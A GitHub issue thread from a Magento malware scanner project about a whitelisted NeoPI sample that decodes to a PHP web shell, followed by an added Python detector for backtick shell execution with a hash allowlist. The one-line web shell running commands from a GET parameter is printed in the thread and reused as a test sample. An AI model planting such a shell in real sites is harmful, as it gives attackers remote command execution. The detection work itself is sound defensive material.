gwillem/magento-malware-scanner

Whitelisted evil file

jeroenvermeulen opened this issue · 4 comments

@gwillem While improving my deobfuscate script, I discovered you probably whitelisted an evil file in commit 4a4c7ff, PR #50:
https://github.com/gwillem/magento-malware-scanner/blob/master/corpus/whitelisted/NeoPI/animal_shell_poc.php
According to my deobfuscate script this file translates to:

<?php if(isset($_GET['cmd'])){ echo `{$_GET['cmd']}`; }

Which is nothing but evil, notice the backticks used in the echo.

It was pragmatically whitelisted because many sites have NeoPI installed, which included this sample malware. But you're right, it is malware!

I think you should not want to have this file in your Magento codebase. If you have it, you should remove it to protect yourself from potential abuse. Having this file installed is playing with fire.

Have you seen it in the wild? It is indeed evil. However, on our platform there are some 50 legit cases (neopi installed outside webroot) and 0 wild occurrences. So to flag it as malware would cause lots of noise without (immediate) tangible benefit, at least here.

No, I did not see it in the wild. I was just decoding all whitelisted files.
Let's close this issue.
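The thread turns on two things: what the decoded one-liner actually does (the backtick operator in PHP executes its contents as a shell command, here fed straight from `$_GET`), and the trade-off between flagging it and allowlisting a known sample to avoid noise. The following is an added example written for this page, not code from gwillem/magento-malware-scanner or from NeoPI: a minimal static check that finds backtick shell execution in PHP source while ignoring backticks inside string literals and comments, rates a finding higher when the command embeds request data, and applies a hash allowlist first, mirroring the "pragmatic whitelisting" described above. The sample inputs, the function names and the allowlist hash are all constructed for the example; the real NeoPI file is not reproduced here.

```python
"""Added example: static check for PHP backtick (shell-exec) usage,
plus a hash allowlist, in the spirit of the issue above.
Not the scanner's own code; names and samples are constructed."""
from __future__ import annotations

import hashlib
import re

# Request-derived superglobals; a command that interpolates one of these
# is attacker-controllable, which is what makes the decoded one-liner critical.
SUPERGLOBALS = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def backtick_commands(src: str) -> list[str]:
    """Return the body of every backtick operator that sits outside
    string literals and comments. Limitations (deliberate, to stay small):
    heredoc/nowdoc blocks and HTML outside <?php ... ?> are not modelled."""
    found: list[str] = []
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if src.startswith("//", i) or (c == "#" and not src.startswith("#[", i)):
            # line comment (a "#[" is a PHP 8 attribute, not a comment)
            j = src.find("\n", i)
            i = n if j < 0 else j + 1
        elif src.startswith("/*", i):
            # block comment
            j = src.find("*/", i + 2)
            i = n if j < 0 else j + 2
        elif c in ("'", '"'):
            # string literal: backticks inside it are just characters
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1
            i = j + 1
        elif c == "`":
            # shell-exec operator: capture its body up to the closing backtick
            j = i + 1
            while j < n and src[j] != "`":
                j += 2 if src[j] == "\\" else 1
            found.append(src[i + 1:j])
            i = j + 1
        else:
            i += 1
    return found


def scan_php(src: str) -> dict:
    """Classify a PHP source string by its backtick usage."""
    cmds = backtick_commands(src)
    tainted = [c for c in cmds if SUPERGLOBALS.search(c)]
    if tainted:
        severity = "critical"      # request data flows into a shell command
    elif cmds:
        severity = "suspicious"    # shell execution, but with a fixed command
    else:
        severity = "clean"
    return {"severity": severity, "commands": cmds, "tainted": tainted}


def sha256(src: str) -> str:
    return hashlib.sha256(src.encode()).hexdigest()


def verdict(src: str, allow_hashes: set[str]) -> str:
    """Allowlist by content hash first (a known sample can be suppressed
    without weakening the rule for everything else), then run the check."""
    if sha256(src) in allow_hashes:
        return "whitelisted"
    return scan_php(src)["severity"]


# Constructed samples (not the NeoPI file): the decoded one-liner quoted in
# the issue, a benign file that only mentions backticks in a comment and a
# string, and a hard-coded command that carries no request data.
SHELL = "<?php if(isset($_GET['cmd'])){ echo `{$_GET['cmd']}`; }"
BENIGN = "<?php // run `ls` manually\n$doc = 'use `backticks` in markdown';"
STATIC_CMD = "<?php $up = `uptime`;"

if __name__ == "__main__":
    allow = {sha256(SHELL)}  # constructed allowlist entry for the demo
    for name, sample in (("SHELL", SHELL), ("BENIGN", BENIGN), ("STATIC_CMD", STATIC_CMD)):
        print(name, scan_php(sample)["severity"], "allowlisted ->", verdict(sample, allow))
```

The point of keeping the allowlist keyed on a content hash rather than on a path is visible in the thread: the legitimate copies live outside the webroot, so a path-based exception would have to be maintained per site, whereas a hash exception covers the known sample everywhere and still flags any modified copy.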